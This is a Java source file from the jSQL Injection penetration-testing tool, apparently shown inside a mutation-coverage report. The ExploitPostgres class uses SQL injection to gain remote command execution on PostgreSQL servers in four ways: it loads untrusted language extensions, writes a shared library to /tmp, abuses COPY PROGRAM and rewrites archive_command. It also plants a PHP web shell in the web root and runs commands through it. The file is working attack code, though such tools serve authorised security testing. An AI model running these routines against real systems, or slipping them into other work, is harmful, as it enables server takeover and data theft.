| 1 | package com.jsql.model.accessible.vendor; | |
| 2 | ||
| 3 | import com.jsql.model.InjectionModel; | |
| 4 | import com.jsql.model.accessible.DataAccess; | |
| 5 | import com.jsql.model.accessible.ResourceAccess; | |
| 6 | import com.jsql.model.accessible.vendor.postgres.ModelYamlPostgres; | |
| 7 | import com.jsql.model.bean.util.Interaction; | |
| 8 | import com.jsql.model.bean.util.Request; | |
| 9 | import com.jsql.model.exception.JSqlException; | |
| 10 | import com.jsql.model.exception.JSqlRuntimeException; | |
| 11 | import com.jsql.model.injection.vendor.model.VendorYaml; | |
| 12 | import com.jsql.util.LogLevelUtil; | |
| 13 | import com.jsql.util.StringUtil; | |
| 14 | import org.apache.commons.lang3.RandomStringUtils; | |
| 15 | import org.apache.commons.lang3.StringUtils; | |
| 16 | import org.apache.logging.log4j.LogManager; | |
| 17 | import org.apache.logging.log4j.Logger; | |
| 18 | import org.yaml.snakeyaml.Yaml; | |
| 19 | ||
| 20 | import java.io.File; | |
| 21 | import java.io.FileInputStream; | |
| 22 | import java.io.IOException; | |
| 23 | import java.io.InputStream; | |
| 24 | import java.net.http.HttpResponse; | |
| 25 | import java.util.Arrays; | |
| 26 | import java.util.List; | |
| 27 | import java.util.Objects; | |
| 28 | import java.util.UUID; | |
| 29 | import java.util.function.BinaryOperator; | |
| 30 | ||
| 31 | public class ExploitPostgres { | |
| 32 | ||
| 33 | /** | |
| 34 | * Log4j logger sent to view. | |
| 35 | */ | |
| 36 | private static final Logger LOGGER = LogManager.getRootLogger(); | |
| 37 | private final InjectionModel injectionModel; | |
| 38 | private String nameExtension = StringUtils.EMPTY; | |
| 39 | private final ModelYamlPostgres modelYaml; | |
| 40 | ||
| 41 | public ExploitPostgres(InjectionModel injectionModel) { | |
| 42 | this.injectionModel = injectionModel; | |
| 43 | var yaml = new Yaml(); | |
| 44 | this.modelYaml = yaml.loadAs( | |
| 45 | injectionModel.getMediatorVendor().getPostgres().instance().getModelYaml().getResource().getExploit(), | |
| 46 | ModelYamlPostgres.class | |
| 47 | ); | |
| 48 | } | |
| 49 | ||
| 50 | public void createUdf(String nameExtension) throws JSqlException { | |
| 51 | LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Exploit mode forced to query body"); | |
| 52 | ||
| 53 |
1
1. createUdf : negated conditional → NO_COVERAGE |
if (StringUtils.isNotEmpty(nameExtension)) { |
| 54 | this.nameExtension = this.createExtension(nameExtension); | |
| 55 |
1
1. createUdf : negated conditional → NO_COVERAGE |
} else if (!this.isRceDetected()) { |
| 56 | return; | |
| 57 | } | |
| 58 | ||
| 59 | this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getDropFunc(), ResourceAccess.DROP_FUNC); | |
| 60 | ||
| 61 | String plCreateBasicExtension = this.getCreateBasicExtension(); | |
| 62 |
1
1. createUdf : negated conditional → NO_COVERAGE |
if (plCreateBasicExtension != null) { |
| 63 | this.injectionModel.injectWithoutIndex(plCreateBasicExtension, ResourceAccess.ADD_FUNC); | |
| 64 |
1
1. createUdf : negated conditional → NO_COVERAGE |
} else if (this.nameExtension.startsWith("sql")) { |
| 65 | this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getDropTable(), ResourceAccess.TBL_DROP); | |
| 66 | this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getCreateTable(), ResourceAccess.TBL_CREATE); | |
| 67 | this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getConfirm().getAddFunc(), ResourceAccess.ADD_FUNC); | |
| 68 | this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getRunCmd(), ResourceAccess.RUN_FUNC); | |
| 69 | var result = this.injectionModel.getResourceAccess().getResult( | |
| 70 | String.format(this.modelYaml.getUdf().getSql().getResultCmd(), StringUtils.EMPTY), | |
| 71 | ResourceAccess.BODY_CONFIRM | |
| 72 | ); | |
| 73 |
1
1. createUdf : negated conditional → NO_COVERAGE |
if (!"1337".equals(result)) { |
| 74 | return; | |
| 75 | } | |
| 76 | } | |
| 77 | ||
| 78 | var functions = this.injectionModel.getResourceAccess().getResult( | |
| 79 | this.modelYaml.getUdf().getSql().getConfirm().getFuncExists(), | |
| 80 | ResourceAccess.BODY_CONFIRM | |
| 81 | ); | |
| 82 |
1
1. createUdf : negated conditional → NO_COVERAGE |
if (!functions.contains("exec_cmd")) { |
| 83 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: function not found"); | |
| 84 | return; | |
| 85 | } | |
| 86 | ||
| 87 | LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Extension] successful: function found for extension [{}]", this.nameExtension); | |
| 88 | var request = new Request(); | |
| 89 |
1
1. createUdf : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_EXTENSION_POSTGRES); |
| 90 |
1
1. createUdf : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(null, null); |
| 91 |
1
1. createUdf : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 92 | } | |
| 93 | ||
| 94 | private String getCreateBasicExtension() { | |
| 95 | String plCreateExtension = null; | |
| 96 |
1
1. getCreateBasicExtension : negated conditional → NO_COVERAGE |
if (this.nameExtension.startsWith("plpython")) { |
| 97 | plCreateExtension = String.format(this.modelYaml.getUdf().getPlpython(), this.nameExtension); | |
| 98 |
1
1. getCreateBasicExtension : negated conditional → NO_COVERAGE |
} else if (this.nameExtension.startsWith("plperl")) { |
| 99 | plCreateExtension = this.modelYaml.getUdf().getPlperl(); | |
| 100 |
1
1. getCreateBasicExtension : negated conditional → NO_COVERAGE |
} else if (this.nameExtension.startsWith("pltcl")) { |
| 101 | plCreateExtension = this.modelYaml.getUdf().getPltcl(); | |
| 102 |
1
1. getCreateBasicExtension : negated conditional → NO_COVERAGE |
} else if (this.nameExtension.startsWith("plr")) { |
| 103 | plCreateExtension = this.modelYaml.getUdf().getPlr(); | |
| 104 |
1
1. getCreateBasicExtension : negated conditional → NO_COVERAGE |
} else if (this.nameExtension.startsWith("pllua")) { |
| 105 | plCreateExtension = this.modelYaml.getUdf().getPllua(); | |
| 106 |
1
1. getCreateBasicExtension : negated conditional → NO_COVERAGE |
} else if (this.nameExtension.startsWith("plsh")) { |
| 107 | plCreateExtension = this.modelYaml.getUdf().getPlsh(); | |
| 108 | } | |
| 109 |
1
1. getCreateBasicExtension : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::getCreateBasicExtension → NO_COVERAGE |
return plCreateExtension; |
| 110 | } | |
| 111 | ||
| 112 | private boolean isRceDetected() throws JSqlException { | |
| 113 | // Archive checked last as asynchronous with delay | |
| 114 |
5
1. isRceDetected : negated conditional → NO_COVERAGE 2. isRceDetected : replaced boolean return with true for com/jsql/model/accessible/vendor/ExploitPostgres::isRceDetected → NO_COVERAGE 3. isRceDetected : negated conditional → NO_COVERAGE 4. isRceDetected : negated conditional → NO_COVERAGE 5. isRceDetected : negated conditional → NO_COVERAGE |
return this.checkRceProgram() || this.checkRceExtension() || this.checkRceLibrary() || this.checkRceArchive(); |
| 115 | } | |
| 116 | ||
| 117 | private boolean checkRceProgram() { | |
| 118 | LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Program] requirements: stack query"); | |
| 119 | var nameTempTable = RandomStringUtils.secure().nextAlphabetic(8); | |
| 120 | this.injectionModel.injectWithoutIndex(String.format( | |
| 121 | this.modelYaml.getFile().getWrite().getTempTable().getAdd(), | |
| 122 | nameTempTable | |
| 123 | ), ResourceAccess.TBL_CREATE); | |
| 124 | this.injectionModel.injectWithoutIndex(String.format( | |
| 125 | this.modelYaml.getUdf().getProgram().getRun(), | |
| 126 | nameTempTable, | |
| 127 | ResourceAccess.WEB_CONFIRM_CMD | |
| 128 | ), ResourceAccess.TBL_FILL); | |
| 129 | var result = this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 130 | this.modelYaml.getUdf().getProgram().getGetResult(), | |
| 131 | nameTempTable | |
| 132 | ), ResourceAccess.TBL_READ); | |
| 133 |
1
1. checkRceProgram : negated conditional → NO_COVERAGE |
if (result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { |
| 134 | LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Program] successful: command execution found"); | |
| 135 | var request = new Request(); | |
| 136 |
1
1. checkRceProgram : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_PROGRAM_POSTGRES); |
| 137 |
1
1. checkRceProgram : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(null, null); |
| 138 |
1
1. checkRceProgram : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 139 |
1
1. checkRceProgram : replaced boolean return with false for com/jsql/model/accessible/vendor/ExploitPostgres::checkRceProgram → NO_COVERAGE |
return true; |
| 140 | } | |
| 141 |
1
1. checkRceProgram : replaced boolean return with true for com/jsql/model/accessible/vendor/ExploitPostgres::checkRceProgram → NO_COVERAGE |
return false; |
| 142 | } | |
| 143 | ||
| 144 | private boolean checkRceExtension() throws JSqlException { | |
| 145 | this.nameExtension = StringUtils.EMPTY; | |
| 146 | LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Extension] requirements: stack query, any of py/sh/pl/lua/sql/r/tcl installed"); | |
| 147 | for (var ext: Arrays.asList("plpython3u", "plpython2u", "plpythonu", "plperlu", "pltclu", "pllua", "plsh", "sql", "plr")) { | |
| 148 |
1
1. checkRceExtension : negated conditional → NO_COVERAGE |
if (StringUtils.isEmpty(this.nameExtension)) { |
| 149 | this.nameExtension = this.createExtension(ext); | |
| 150 | } | |
| 151 | } | |
| 152 |
1
1. checkRceExtension : negated conditional → NO_COVERAGE |
if (StringUtils.isEmpty(this.nameExtension)) { |
| 153 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE [Extension] failure: no extension found"); | |
| 154 |
1
1. checkRceExtension : replaced boolean return with false for com/jsql/model/accessible/vendor/ExploitPostgres::checkRceExtension → NO_COVERAGE |
return true; |
| 155 | } | |
| 156 |
1
1. checkRceExtension : replaced boolean return with true for com/jsql/model/accessible/vendor/ExploitPostgres::checkRceExtension → NO_COVERAGE |
return false; |
| 157 | } | |
| 158 | ||
| 159 | public boolean checkRceLibrary() throws JSqlException { | |
| 160 | LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Library] requirements: stack query"); | |
| 161 | this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getLibrary().getDropFunc()), ResourceAccess.DROP_FUNC); | |
| 162 | var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 163 | this.modelYaml.getUdf().getLibrary().getLoFromText(), | |
| 164 | String.join(StringUtils.EMPTY, ExploitPostgres.toHexChunks("v10.64")) | |
| 165 | ), ResourceAccess.ADD_LOID); | |
| 166 |
1
1. checkRceLibrary : negated conditional → NO_COVERAGE |
if (StringUtils.isEmpty(loid)) { |
| 167 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND); | |
| 168 |
1
1. checkRceLibrary : replaced boolean return with true for com/jsql/model/accessible/vendor/ExploitPostgres::checkRceLibrary → NO_COVERAGE |
return false; |
| 169 | } | |
| 170 | var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".so"; | |
| 171 | this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 172 | this.modelYaml.getUdf().getLibrary().getLoToFile(), | |
| 173 | loid, | |
| 174 | "/tmp/" + nameExploit | |
| 175 | ), ResourceAccess.WRITE_LOID); | |
| 176 | this.injectionModel.injectWithoutIndex(String.format( | |
| 177 | this.modelYaml.getUdf().getLibrary().getCreateFunction(), | |
| 178 | "/tmp/" + nameExploit | |
| 179 | ), ResourceAccess.ADD_FUNC); | |
| 180 | String result = this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 181 | this.modelYaml.getUdf().getLibrary().getRunFunc(), | |
| 182 | ResourceAccess.WEB_CONFIRM_CMD + "%20" | |
| 183 | ), "confirm"); | |
| 184 |
1
1. checkRceLibrary : negated conditional → NO_COVERAGE |
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { |
| 185 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); | |
| 186 |
1
1. checkRceLibrary : replaced boolean return with true for com/jsql/model/accessible/vendor/ExploitPostgres::checkRceLibrary → NO_COVERAGE |
return false; |
| 187 | } | |
| 188 | LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Library] successful"); | |
| 189 | var request = new Request(); | |
| 190 |
1
1. checkRceLibrary : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_LIBRARY_POSTGRES); |
| 191 |
1
1. checkRceLibrary : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(null, null); |
| 192 |
1
1. checkRceLibrary : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 193 |
1
1. checkRceLibrary : replaced boolean return with false for com/jsql/model/accessible/vendor/ExploitPostgres::checkRceLibrary → NO_COVERAGE |
return true; |
| 194 | } | |
| 195 | ||
| 196 | private boolean checkRceArchive() throws JSqlException { | |
| 197 | LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Archive] requirements: archive_mode enabled"); | |
| 198 |
1
1. checkRceArchive : negated conditional → NO_COVERAGE |
if (!StringUtils.EMPTY.equals(this.runArchive(null))) { |
| 199 | LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Archive] successful: command execution found"); | |
| 200 | var request = new Request(); | |
| 201 |
1
1. checkRceArchive : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_WAL_POSTGRES); |
| 202 |
1
1. checkRceArchive : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(null, null); |
| 203 |
1
1. checkRceArchive : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 204 |
1
1. checkRceArchive : replaced boolean return with false for com/jsql/model/accessible/vendor/ExploitPostgres::checkRceArchive → NO_COVERAGE |
return true; |
| 205 | } | |
| 206 |
1
1. checkRceArchive : replaced boolean return with true for com/jsql/model/accessible/vendor/ExploitPostgres::checkRceArchive → NO_COVERAGE |
return false; |
| 207 | } | |
| 208 | ||
| 209 | private static List<String> toHexChunks(String filename) throws JSqlException { | |
| 210 | try { | |
| 211 | byte[] fileData = Objects.requireNonNull( // getResource > toURI > toPath > readAllBytes() not possible in .jar | |
| 212 | ExploitMysql.class.getClassLoader().getResourceAsStream("exploit/postgres/"+ filename +".so") | |
| 213 | ).readAllBytes(); | |
| 214 |
1
1. toHexChunks : replaced return value with Collections.emptyList for com/jsql/model/accessible/vendor/ExploitPostgres::toHexChunks → NO_COVERAGE |
return StringUtil.toHexChunks(fileData); |
| 215 | } catch (IOException e) { | |
| 216 | throw new JSqlException(e); | |
| 217 | } | |
| 218 | } | |
| 219 | ||
| 220 | public String runRceLibraryCmd(String command, UUID uuidShell) { | |
| 221 | String result; | |
| 222 | try { | |
| 223 | result = this.injectionModel.getResourceAccess().getResult(String.format( | |
| 224 | this.modelYaml.getUdf().getLibrary().getRunFunc(), | |
| 225 | command.replace(StringUtils.SPACE, "%20") + "%20" | |
| 226 | ), ResourceAccess.RUN_FUNC); | |
| 227 | } catch (JSqlException e) { | |
| 228 | result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command); | |
| 229 | } | |
| 230 | var request = new Request(); | |
| 231 |
1
1. runRceLibraryCmd : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.GET_TERMINAL_RESULT); |
| 232 |
1
1. runRceLibraryCmd : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(uuidShell, result.trim() +"\n"); // missing newline on some extensions |
| 233 |
1
1. runRceLibraryCmd : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 234 |
1
1. runRceLibraryCmd : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::runRceLibraryCmd → NO_COVERAGE |
return result; |
| 235 | } | |
| 236 | ||
| 237 | private String runArchive(String command) throws JSqlException { | |
| 238 |
1
1. runArchive : negated conditional → NO_COVERAGE |
boolean isSetup = command == null; |
| 239 | ||
| 240 | String status = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getArchive().getGetStatus(), "wal#status"); | |
| 241 |
2
1. runArchive : negated conditional → NO_COVERAGE 2. runArchive : negated conditional → NO_COVERAGE |
if (isSetup && !status.contains("on")) { |
| 242 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit [Archive] failure: archive_mode disabled"); | |
| 243 | return StringUtils.EMPTY; | |
| 244 | } | |
| 245 | ||
| 246 | String pathConf = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getArchive().getGetPathConf(), "conf#path"); | |
| 247 | String loidConf = this.injectionModel.getResourceAccess().getResult(String.format( | |
| 248 | this.modelYaml.getUdf().getArchive().getGetConfLoid(), | |
| 249 | pathConf | |
| 250 | ), "conf#loid"); | |
| 251 | String lengthConf = this.injectionModel.getResourceAccess().getResult(String.format( | |
| 252 | this.modelYaml.getUdf().getArchive().getGetConfLength(), | |
| 253 | loidConf | |
| 254 | ), "conf#size"); | |
| 255 | ||
| 256 | this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 257 | this.modelYaml.getUdf().getArchive().getPutCmd(), | |
| 258 | loidConf, | |
| 259 | lengthConf, | |
| 260 |
1
1. runArchive : negated conditional → NO_COVERAGE |
isSetup ? ResourceAccess.WEB_CONFIRM_CMD +"%20" : command |
| 261 | ), "conf#append"); | |
| 262 | ||
| 263 | this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 264 | this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), | |
| 265 | loidConf, | |
| 266 | pathConf | |
| 267 | ), "conf#write"); | |
| 268 | this.injectionModel.getResourceAccess().getResultWithCatch(this.modelYaml.getUdf().getArchive().getReloadConf(), "wal#reload"); | |
| 269 | ||
| 270 | String cmdArchive = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getArchive().getGetCmd(), "cmd#confirm"); | |
| 271 |
2
1. runArchive : negated conditional → NO_COVERAGE 2. runArchive : negated conditional → NO_COVERAGE |
if (isSetup && !cmdArchive.contains("/tmp/cmd.txt")) { |
| 272 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit [Archive] failure: archive command missing"); | |
| 273 | return StringUtils.EMPTY; | |
| 274 | } | |
| 275 | ||
| 276 | this.injectionModel.getResourceAccess().getResultWithCatch(this.modelYaml.getUdf().getArchive().getRunWal(), "wal#run"); | |
| 277 | try { | |
| 278 |
1
1. runArchive : removed call to java/lang/Thread::sleep → NO_COVERAGE |
Thread.sleep(750); // wait for result as archiving is slow |
| 279 | } catch (InterruptedException e) { | |
| 280 | LOGGER.log(LogLevelUtil.IGNORE, e, e); | |
| 281 |
1
1. runArchive : removed call to java/lang/Thread::interrupt → NO_COVERAGE |
Thread.currentThread().interrupt(); |
| 282 | } | |
| 283 | String loidResult = this.injectionModel.getResourceAccess().getResultWithCatch(this.modelYaml.getUdf().getArchive().getGetResult(), "result#loid"); | |
| 284 | String result = this.injectionModel.getResourceAccess().getResult(String.format( | |
| 285 | this.modelYaml.getFile().getRead().getLargeObject().getToText(), | |
| 286 | loidResult | |
| 287 | ), "result#read"); | |
| 288 | ||
| 289 |
2
1. runArchive : negated conditional → NO_COVERAGE 2. runArchive : negated conditional → NO_COVERAGE |
if (isSetup && !result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { |
| 290 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit [Archive] failure: command result missing"); | |
| 291 | return StringUtils.EMPTY; | |
| 292 | } | |
| 293 |
1
1. runArchive : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::runArchive → NO_COVERAGE |
return result; |
| 294 | } | |
| 295 | ||
| 296 | private String createExtension(String nameExtension) throws JSqlException { | |
| 297 | LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Checking extension {}", nameExtension); | |
| 298 | this.injectionModel.injectWithoutIndex(String.format( | |
| 299 | this.modelYaml.getUdf().getExtension().getCreate(), | |
| 300 | nameExtension | |
| 301 | ), "body#add-ext"); | |
| 302 | String languages = this.injectionModel.getResourceAccess().getResult( | |
| 303 | this.modelYaml.getUdf().getExtension().getLanguages(), | |
| 304 | "body#confirm-ext" | |
| 305 | ); | |
| 306 |
1
1. createExtension : negated conditional → NO_COVERAGE |
if (languages.contains(nameExtension)) { |
| 307 |
1
1. createExtension : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::createExtension → NO_COVERAGE |
return nameExtension; |
| 308 | } | |
| 309 | return StringUtils.EMPTY; | |
| 310 | } | |
| 311 | ||
| 312 | public String runRceArchiveCmd(String command, UUID uuidShell) { | |
| 313 | String result; | |
| 314 | try { | |
| 315 | result = this.runArchive(command.replace(StringUtils.SPACE, "%20") +"%20"); | |
| 316 | } catch (JSqlException e) { | |
| 317 | result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command); | |
| 318 | } | |
| 319 | var request = new Request(); | |
| 320 |
1
1. runRceArchiveCmd : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.GET_TERMINAL_RESULT); |
| 321 |
1
1. runRceArchiveCmd : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(uuidShell, result.trim() +"\n"); // missing newline on some extensions |
| 322 |
1
1. runRceArchiveCmd : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 323 |
1
1. runRceArchiveCmd : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::runRceArchiveCmd → NO_COVERAGE |
return result; |
| 324 | } | |
| 325 | ||
| 326 | public String runRceProgramCmd(String command, UUID uuidShell) { | |
| 327 | String result; | |
| 328 | try { | |
| 329 | var nameTempTable = RandomStringUtils.secure().nextAlphabetic(8); | |
| 330 | this.injectionModel.injectWithoutIndex(String.format( | |
| 331 | this.modelYaml.getFile().getWrite().getTempTable().getAdd(), | |
| 332 | nameTempTable | |
| 333 | ), ResourceAccess.TBL_CREATE); | |
| 334 | this.injectionModel.injectWithoutIndex(String.format( | |
| 335 | this.modelYaml.getUdf().getProgram().getRun(), | |
| 336 | nameTempTable, | |
| 337 | command.replace(StringUtils.SPACE, "%20") +"%20" | |
| 338 | ), ResourceAccess.TBL_FILL); | |
| 339 | result = this.injectionModel.getResourceAccess().getResult(String.format( | |
| 340 | this.modelYaml.getUdf().getProgram().getGetResult(), | |
| 341 | nameTempTable | |
| 342 | ), ResourceAccess.TBL_READ); | |
| 343 | } catch (JSqlException e) { | |
| 344 | result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command); | |
| 345 | } | |
| 346 | var request = new Request(); | |
| 347 |
1
1. runRceProgramCmd : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.GET_TERMINAL_RESULT); |
| 348 |
1
1. runRceProgramCmd : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(uuidShell, result.trim() +"\n"); // missing newline on some extensions |
| 349 |
1
1. runRceProgramCmd : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 350 |
1
1. runRceProgramCmd : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::runRceProgramCmd → NO_COVERAGE |
return result; |
| 351 | } | |
| 352 | ||
| 353 | public String runRceExtensionCmd(String command, UUID uuidShell) { | |
| 354 | String result; | |
| 355 | try { | |
| 356 |
1
1. runRceExtensionCmd : negated conditional → NO_COVERAGE |
if ("sql".equals(this.nameExtension)) { |
| 357 | this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getClean(), "body#empty-tbl"); | |
| 358 | this.injectionModel.injectWithoutIndex(String.format( | |
| 359 | this.modelYaml.getUdf().getSql().getRunFunc(), | |
| 360 | command.replace(StringUtils.SPACE, "%20") | |
| 361 | ), ResourceAccess.ADD_FUNC); | |
| 362 | this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getRunCmd(), ResourceAccess.UDF_RUN_CMD); | |
| 363 | result = this.injectionModel.getResourceAccess().getResult(String.format( | |
| 364 | this.modelYaml.getUdf().getSql().getResultCmd(), | |
| 365 | VendorYaml.TRAIL_SQL | |
| 366 | ), "body#result") +"\n"; | |
| 367 | } else { | |
| 368 | result = this.injectionModel.getResourceAccess().getResult( | |
| 369 | String.format( | |
| 370 | this.modelYaml.getUdf().getRunFunc(), | |
| 371 | command.replace(StringUtils.SPACE, "%20"), // prevent SQL cleaning on system cmd: 'ls-l' instead of 'ls -l' | |
| 372 | VendorYaml.TRAIL_SQL | |
| 373 | ), | |
| 374 | ResourceAccess.UDF_RUN_CMD | |
| 375 | ); | |
| 376 | } | |
| 377 | } catch (JSqlException e) { | |
| 378 | result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command); | |
| 379 | } | |
| 380 | var request = new Request(); | |
| 381 |
1
1. runRceExtensionCmd : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.GET_TERMINAL_RESULT); |
| 382 |
1
1. runRceExtensionCmd : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(uuidShell, result.trim() +"\n"); // missing newline on some extensions |
| 383 |
1
1. runRceExtensionCmd : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 384 |
1
1. runRceExtensionCmd : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::runRceExtensionCmd → NO_COVERAGE |
return result; |
| 385 | } | |
| 386 | ||
| 387 | public void createWeb(String pathExploit, String urlExploit) { | |
| 388 | String bodyExploit = StringUtil.base64Decode( | |
| 389 | this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) | |
| 390 | ) | |
| 391 | .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) | |
| 392 | .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); | |
| 393 | ||
| 394 | var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 395 | this.modelYaml.getFile().getWrite().getLargeObject().getFromText(), | |
| 396 | bodyExploit.replace("'", "\"") | |
| 397 | ), ResourceAccess.ADD_LOID); | |
| 398 |
1
1. createWeb : negated conditional → NO_COVERAGE |
if (StringUtils.isEmpty(loid)) { |
| 399 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND); | |
| 400 | return; | |
| 401 | } | |
| 402 | var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; | |
| 403 | this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 404 | this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), | |
| 405 | loid, | |
| 406 | pathExploit + nameExploit | |
| 407 | ), ResourceAccess.WRITE_LOID); | |
| 408 | ||
| 409 | BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | |
| 410 | String result = this.injectionModel.getResourceAccess().callCommand( | |
| 411 | urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD | |
| 412 | ); | |
| 413 |
1
1. lambda$createWeb$0 : negated conditional → NO_COVERAGE |
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { |
| 414 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); | |
| 415 | return StringUtils.EMPTY; | |
| 416 | } | |
| 417 | var request = new Request(); | |
| 418 |
1
1. lambda$createWeb$0 : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); |
| 419 |
1
1. lambda$createWeb$0 : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(urlSuccess); |
| 420 |
1
1. lambda$createWeb$0 : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 421 |
1
1. lambda$createWeb$0 : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::lambda$createWeb$0 → NO_COVERAGE |
return urlSuccess; |
| 422 | }; | |
| 423 | ||
| 424 | this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | |
| 425 | } | |
| 426 | ||
| 427 | public String createSql(String pathExploit, String urlExploit, String username, String password) { | |
| 428 | BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | |
| 429 | var resultQuery = this.injectionModel.getResourceAccess().runSqlShell( | |
| 430 | ResourceAccess.SQL_CONFIRM_CMD, | |
| 431 | null, | |
| 432 | urlSuccess, | |
| 433 | username, | |
| 434 | password, | |
| 435 | false | |
